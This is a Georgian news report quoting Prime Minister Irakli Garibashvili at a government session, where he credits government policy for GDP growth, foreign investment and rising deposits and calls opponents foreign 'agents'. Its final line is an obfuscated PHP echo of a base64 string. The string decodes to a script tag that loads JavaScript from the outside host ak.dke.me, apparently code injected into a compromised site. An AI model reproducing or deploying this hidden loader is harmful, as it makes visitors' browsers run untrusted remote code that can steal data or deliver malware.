celsiusi
ავერსი საქკაბელი

 საქართველოს პრემიერ-მინისტრის, ირაკლი ღარიბაშვილის განცხადებით, ქვეყანაში ეკონომიკური ზრდა ფიქსირდება, მეტი ინვესტიცია იდება ეკონომიკაში, ბიზნესი ვითარდება და ეს ყველაფერი მთავრობის სწორი პოლიტიკის შედეგია.

ღარიბაშვილის თქმით, ამ ყველაფერს სჭირდება შენარჩუნება.

„მინდა, ჩვენს რადიკალურ ოპონენტებს, ყველას, ვინც სკეპტიკოსია, კიდევ ერთხელ შევახსენო, არაფერი არ იქნებოდა, არც ინვესტიციები, არც ეკონომიკური ზრდა, პირიქით, ვიქნებოდით ალბათ მინუს 10 და უფრო მეტ პროცენტში, იქნებოდა ეკონომიკური ვარდნა და მოხდებოდა კაპიტალის გადინება, ხელისუფლებაში რომ ყოფილიყვნენ, არ მოვერიდები ამის თქმას, სამშობლოგაყიდული, უპასუხისმგებლო აგენტები და სხვა სახელმწიფოების ინტერესების გამტარებელი ე.წ პოლიტიკოსები. ეს არის მთავარი სხვაობა. რა თქმა უნდა, ჩვენ ამას შევინარჩუნებთ, ჩვენი ინტერესია, რომ უფრო მეტი უცხოური ვალუტა შემოვიდეს. ეს ამყარებს ჩვენს ეროვნულ ვალუტას. ზოგადად კარგია, რომ მეტი ინვესტიცია იდება ეკონომიკაში. აქვე, მინდა, აღვნიშნო, რომ ქვეყნების მიხედვით, მეორე კვარტალში ყველაზე დიდი მოცულობის ინვესტიცია შემოვიდა გაერთიანებული სამეფოდან, ევროპიდან არის შემოსული ძირითადი ინვესტიცია, ისევე როგორც პირველ კვარტალში. ძალიან გვახარებს, რომ ქვეყანაში უცხოური კაპიტალი შემოდის. ეს კიდევ და კიდევ მიუთითებს, რომ ქვეყანაში არის სტაბილურობა და ისინი ენდობიან ჩვენ მიერ შექმნილ კონკურენტულ, თავისუფალ გარემოს, რომელიც ბოლო 10 წელია, შევქმენით ბიზნესისთვის.

მინდა, შედარებისთვის კიდევ ერთხელ მოვიყვანო, 2020 წელს მთელი ქვეყნის მთლიანი შიდა პროდუქტი იყო დაახლოებით 50 მილიარდი ლარი, წელს 80 მილიარდ ლარამდეა. ანუ, ბოლო სამ წელში დაახლოებით 30 მილიარდი ლარით გაიზარდა ჩვენი ქვეყნის ეკონომიკა. ერთ სულ მოსახლეზე გადაანგარიშებით თითქმის 8 000 დოლარზე გადის წლის ბოლოს. ეს დიდი ნახტომია, ამას სჭირდება შენარჩუნება, დაცვა და უფრო გაძლიერება. შედარებისთვის, 2012 წელს ჩვენი მოქალაქეების დეპოზიტების საერთო მოცულობა იყო დაახლოებით 2 მილიარდ დოლარზე მეტი და ამდენივე ლარში. ახლა არის 23 მილიარდი დოლარი. ამდენივე, 22 მილიარდია ლარში. გაათმაგებულია კომერციულ ბანკებში განთავსებული დეპოზიტების რაოდენობა. ანუ, ხალხი მდიდრდება, ეს ნიშნავს, რომ ბიზნესი ვითარდება, ქვეყანა ვითარდება, ძლიერდება და ეს არის ჩვენი სწორი პოლიტიკის შედეგი, რაც დაიწყო ბატონმა ბიძინა ივანიშვილმა და შემდეგ გაგრძელდა. ბოლო 10 წელია, ამ კურსს მივყვებით და ვინარჩუნებთ“, – განაცხადა ირაკლი ღარიბაშვილმა მთავრობის დღევანდელ სხდომაზე.

446
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");